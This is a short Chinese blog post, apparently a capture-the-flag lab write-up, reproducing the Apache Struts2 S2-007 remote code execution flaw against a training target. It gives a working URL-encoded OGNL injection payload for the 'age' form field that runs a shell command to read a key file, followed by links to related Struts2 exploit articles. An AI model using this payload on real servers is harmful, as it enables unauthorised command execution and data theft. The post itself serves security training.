墨者学院_Apache Struts2远程代码执行漏洞(S2-007)复现
2019-08-26 09:02
330 查看
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cc_de_csdn/article/details/100070897
- 打开靶场,任意填写表单并提交
- 使用BrupSuite捕获报文
- 修改age的值为:
- %27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27cat /key.txt%27%29.getInputStream%28%29%29%29+%2B+%27
- 得到KEY
相关文章推荐
- 墨者学院_Apache Struts2远程代码执行漏洞(S2-015)复现
- 墨者学院_Apache Struts2远程代码执行漏洞(S2-016)复现
- 墨者学院_Apache Struts2远程代码执行漏洞(S2-001)
- Apache Struts2 远程代码执行漏洞(S2-045)技术分析与防护方案
- Apache struts2 Freemarker标签远程命令执行_CVE-2017-12611(S2-053)漏洞复现
- Apache struts2远程命令执行_CVE-2017-9805(S2-052)漏洞复现
- Apache struts2远程命令执行_CVE-2017-9805(S2-052)漏洞复现
- Apache struts2 namespace远程命令执行_CVE-2018-11776(S2-057)漏洞复现
- Apache struts2 namespace远程命令执行_CVE-2018-11776(S2-057)漏洞复现
- 【预警通告】Apache Struts2(S2-053) 远程代码执行漏洞 威胁预警通告
- Apache Struts2(S2-045)漏洞利用
- 9.漏洞验证系列--Apache Struts2 远程命令执行(S2-045)
- Apache Struts2 s2-020补丁安全绕过漏洞
- Apache Struts2(S2-045)漏洞反思总结
- struts2 CVE-2012-0838 S2-007 Remote Code Execution && Hotfix
- Apache Struts2(S2-045)漏洞反思总结
- Struts2 REST 插件 XStream 远程代码执行漏洞 S2-052 复现过程
- exploit - CVE-2017-5638 - Apache Struts2 S2-045
- Struts2最新远程代码执行漏洞(S2-016)描述
- CNNVD:关于Apache Struts2(S2-045)漏洞情况的通报